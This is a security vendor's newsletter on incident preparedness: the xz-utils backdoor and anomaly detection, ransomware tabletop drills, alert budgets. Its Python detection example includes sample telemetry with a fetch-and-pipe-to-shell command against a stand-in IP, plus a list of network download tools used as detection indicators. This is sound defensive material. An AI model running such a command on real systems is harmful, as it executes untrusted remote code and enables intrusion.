Rehearse for the worst: CISOs share hard-won lessons on preparedness
Preparing for the worst is an important part of a CISO’s job. From zero-day exploits and insider threats to system failures and compliance violations, many have learned this lesson the hard way through experience on the front lines of incident response. In times of crisis, teams rely on security leaders to guide them through the process of containing the incident and recovering from its impact. In this edition of the Code to Cloud Monthly Digest, we’re sharing strategies and lessons that CISOs use to keep their teams sharp and ready to respond when incidents occur.
Anomaly detection in action: Lessons from the xz-utils vulnerability
When the xz-utils backdoor (CVE-2024-3094) was disclosed, security teams worldwide raced to patch their systems. But what if attackers had exploited it before it was disclosed?
This is where anomaly detection truly shines. By identifying and flagging unusual behaviors, it can help spot the exploitation of "not-yet-known" vulnerabilities. In the case of xz-utils, this could have made all the difference. To demonstrate the power of anomaly detection, our Field CISO Andreas Schneider conducted a live hack of a cloud environment, exploiting the xz-utils backdoor to escalate privileges and move laterally through the system. He then investigated the associated Lacework Composite Alert to understand the attacker's actions. The simulation highlighted how anomaly detection can recognize deviations from normal operations, even when the specific exploit has not been seen before.
Watch Andy's full video below to see the live hack in action, or check out the blog for a step-by-step breakdown.
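To make the "deviation from normal operations" idea concrete, here is an added example that is not Lacework's code and not part of the original post. It learns which parent-to-child process pairs a host normally produces during a clean baseline window, flags any pair that host has never produced, and rolls the hits up into one finding per host. All telemetry is constructed for the example, and the REMOTE_SERVICES and NET_TOOLS sets are assumptions. The chain sshd -> sh -> curl is the shape the xz-utils backdoor produces, since the implant runs attacker-supplied commands from inside sshd rather than through a normal login.

```python
"""Process-lineage anomaly detection, as an added example (not Lacework's code).

Learn which parent->child process pairs each host normally produces during a
clean baseline window, then flag pairs the host has never produced. Telemetry
here is constructed for the example. The chain sshd -> sh -> curl is the kind
of deviation the xz-utils backdoor (CVE-2024-3094) produces: the implant runs
attacker-supplied commands from inside sshd, so the first visible symptom is
sshd spawning a shell that was not part of an ordinary login.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str   # parent process image name
    child: str    # spawned process image name
    cmdline: str


# Constructed baseline window: distinct lineage pairs seen on a healthy host.
BASELINE = [
    ProcEvent("web-1", "systemd", "sshd", "/usr/sbin/sshd -D"),
    ProcEvent("web-1", "sshd", "bash", "-bash"),  # routine admin logins
    ProcEvent("web-1", "bash", "systemctl", "systemctl restart nginx"),
    ProcEvent("web-1", "cron", "sh", "/bin/sh -c /usr/local/bin/backup.sh"),
    ProcEvent("web-1", "sh", "tar", "tar czf /backup/www.tgz /var/www"),
]

# Constructed evaluation window: one ordinary login plus the backdoor chain.
EVAL = [
    ProcEvent("web-1", "sshd", "bash", "-bash"),
    ProcEvent("web-1", "sshd", "sh", "sh -c 'id; curl -s http://203.0.113.7/s | sh'"),
    ProcEvent("web-1", "sh", "id", "id"),
    ProcEvent("web-1", "sh", "curl", "curl -s http://203.0.113.7/s"),
]

# Network-facing daemons whose unexpected children deserve extra weight, and
# tools that suggest a second stage being fetched. Both sets are assumptions.
REMOTE_SERVICES = {"sshd", "nginx", "httpd"}
NET_TOOLS = {"curl", "wget", "nc", "ncat"}


def build_baseline(events):
    """Map host -> set of (parent, child) pairs observed during the clean window."""
    seen = defaultdict(set)
    for e in events:
        seen[e.host].add((e.parent, e.child))
    return seen


def find_anomalies(baseline, events):
    """Return events whose lineage pair the host has never produced before."""
    return [e for e in events
            if (e.parent, e.child) not in baseline.get(e.host, set())]


def compose(anomalies):
    """Roll per-event anomalies up into one finding per host. Severity rises
    when an exposed service is the root and a download tool appears in the chain."""
    by_host = defaultdict(list)
    for e in anomalies:
        by_host[e.host].append(e)
    findings = {}
    for host, evs in by_host.items():
        exposed = any(e.parent in REMOTE_SERVICES for e in evs)
        egress = any(e.child in NET_TOOLS for e in evs)
        if exposed and egress:
            severity = "high"
        elif exposed or egress:
            severity = "medium"
        else:
            severity = "low"
        findings[host] = {
            "severity": severity,
            "events": len(evs),
            "chain": [f"{e.parent}->{e.child}" for e in evs],
        }
    return findings


if __name__ == "__main__":
    hits = find_anomalies(build_baseline(BASELINE), EVAL)
    for e in hits:
        print(f"NEW LINEAGE {e.host}: {e.parent} -> {e.child}  [{e.cmdline}]")
    print(compose(hits))
```

The ordinary sshd -> bash login in the evaluation window is not flagged because the baseline already contains it; only the three pairs the host never produced (sshd -> sh, sh -> id, sh -> curl) surface, and they combine into a single high-severity finding. The caveat every practitioner should keep in mind: the baseline is only as good as the window it was learned from. If the attacker was already active during that window, their lineage pairs are learned as normal, so baselines should be built from a period you have independent reason to trust and re-examined when they change.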
Ransomware in manufacturing: Why tabletop exercises are a must-have
When it comes to cybersecurity threats in the manufacturing industry, ransomware tops the list for David Ortiz, Global CISO at consumer goods giant Church & Dwight Co., Inc.
"Everybody is faced with how to defend against ransomware attacks and how to respond when that attack may happen," he said on a recent episode of the Code to Cloud podcast.
The high-profile Colonial Pipeline incident was a wake-up call for the manufacturing sector, demonstrating just how devastating the impact of a ransomware attack can be.
For David, being prepared is priority number one. He believes that having a comprehensive and well-rehearsed response plan in place is an absolute must-have for manufacturers looking to mitigate the risks posed by ransomware threats.
“We have a robust cybersecurity incident response plan that focuses on both our corporate and our manufacturing sites,” he said. This plan includes specific playbooks for different scenarios like a ransomware attack.
But having a plan isn't enough — it needs to be put into practice regularly. “We're drilling all the time,” David said. “We do tabletop exercises. We're out there talking to people, making sure they are aware of our cyber incident response process. We have a really good partnership with everyone within our IT department and our business areas to make sure that everyone understands how we would react and respond to any type of event.”
Hear more of David’s advice for managing security risks in the manufacturing industry in his episode of Code to Cloud.
From the trenches to the top: The value of breach experience
David isn’t the only CISO who believes that practice makes perfect when it comes to incident response. “When you get into the middle of an incident, you don’t always have time to stop and think,” our Global Field CISO Tim Chase said to IT Brew. That's why he agrees that tabletop exercises are crucial for preparation.
Tim also suggested that having someone on your team who has already spent significant time navigating the complexities of an attack — from containment to legal communication and appropriate disclosure — can be invaluable.
In fact, there's a growing consensus among security professionals that practitioners who have weathered the storm of breaches bring a unique and valuable kind of crisis-management experience to the table.
“I know that it is important to me to have a CISO that has been there, that has done that before,” Tim said.
Read the full article for more CISO perspectives on why it’s important to have battle-hardened security leaders on the team.
Alert budget: Your key to security team sanity
Ever heard of an “alert budget”? It’s a way to measure how many alerts a security team can realistically handle. It takes into account both the number of alerts and how complex they are to deal with.?
Overwhelming alerts can be a major issue for short-staffed security teams, but by explicitly managing an alert budget, smarter decisions can be made about the types of alerts to take on, the systems to monitor, and the tools to invest in.
To optimize an alert budget, Lacework CISO Lea Kissner suggests focusing on two key areas: better signal and easier alerts.
Proactively managing an alert budget can make or break a team's success and prevent burnout, especially for severely understaffed and under-resourced teams. By getting a handle on alerts, teams can operate at full capacity without losing their minds in the process.
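The budget becomes a concrete decision tool once each alert source is described by its volume, its median triage effort (the complexity term above) and how often it turns out to be real. Below is an added example, not from Lea's article and not Lacework's code, that computes a team's weekly triage capacity, shows how far over budget the full alert set would put them, and greedily admits sources by real findings per analyst-hour until the budget is spent. All figures are constructed.

```python
"""Alert budget planning, as an added example (not from Lea Kissner's article).

Model: each alert source produces some alerts per week; each alert costs a
median number of analyst-minutes to close (the 'complexity' term); some
fraction turn out to matter. The budget is the analyst-minutes per week that
are genuinely available for triage. All figures below are constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class AlertSource:
    name: str
    alerts_per_week: float
    triage_minutes: float       # median effort to close one alert
    true_positive_rate: float   # fraction that turn out to be real

    @property
    def weekly_cost(self):
        """Analyst-minutes this source consumes per week."""
        return self.alerts_per_week * self.triage_minutes

    @property
    def weekly_yield(self):
        """Expected real findings per week."""
        return self.alerts_per_week * self.true_positive_rate

    @property
    def yield_per_hour(self):
        """Real findings per analyst-hour spent: the 'signal' of the source."""
        if not self.weekly_cost:
            return 0.0
        return self.weekly_yield / (self.weekly_cost / 60.0)


# Constructed alert sources for a small cloud environment.
SOURCES = [
    AlertSource("Known-bad IP egress",        20,  15, 0.40),
    AlertSource("Anomalous process lineage",  12,  25, 0.50),
    AlertSource("IAM privilege change",       30,  10, 0.20),
    AlertSource("Unsigned binary executed",  200,   8, 0.02),
    AlertSource("Internet port scan",        900,   2, 0.001),
]


def weekly_budget_minutes(analysts, hours_each, triage_fraction):
    """Triage capacity: only the fraction of the week not taken by projects,
    on-call handoffs and meetings counts toward the budget."""
    return analysts * hours_each * 60.0 * triage_fraction


def utilization(sources, budget):
    """How many times over budget the team would be with every source switched on."""
    return sum(s.weekly_cost for s in sources) / budget


def plan(sources, budget):
    """Greedy plan: admit sources in order of real findings per triage hour
    until the budget is spent. Returns (kept, dropped, minutes_used)."""
    kept, dropped, used = [], [], 0.0
    for s in sorted(sources, key=lambda s: s.yield_per_hour, reverse=True):
        if used + s.weekly_cost <= budget:
            kept.append(s)
            used += s.weekly_cost
        else:
            dropped.append(s)
    return kept, dropped, used


if __name__ == "__main__":
    budget = weekly_budget_minutes(analysts=2, hours_each=40, triage_fraction=0.3)
    print(f"budget {budget:.0f} min/week; demand is {utilization(SOURCES, budget):.1f}x budget")
    kept, dropped, used = plan(SOURCES, budget)
    for s in kept:
        print(f"KEEP {s.name:28} {s.weekly_cost:6.0f} min/wk  {s.yield_per_hour:.2f} findings/hr")
    for s in dropped:
        print(f"DROP {s.name:28} {s.weekly_cost:6.0f} min/wk  {s.yield_per_hour:.2f} findings/hr")
    print(f"used {used:.0f} of {budget:.0f} minutes")
```

With two analysts spending 30% of their week on triage, the team has 1,440 minutes; the five sources as configured would demand about three times that, which is exactly the overwhelmed state the passage describes. The two levers Lea names map directly onto the model: better signal raises true_positive_rate (or cuts alerts_per_week through suppression), and easier alerts lower triage_minutes through enrichment and automation. Either moves a dropped source's findings-per-hour back above the line. One caveat: a greedy plan treats coverage as fungible, so a source that backs a required control should be tuned to fit the budget rather than switched off.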
Learn more in Lea's article for Security Magazine.
What would you like to see in the next issue of the Code to Cloud Digest? Let us know in the comments.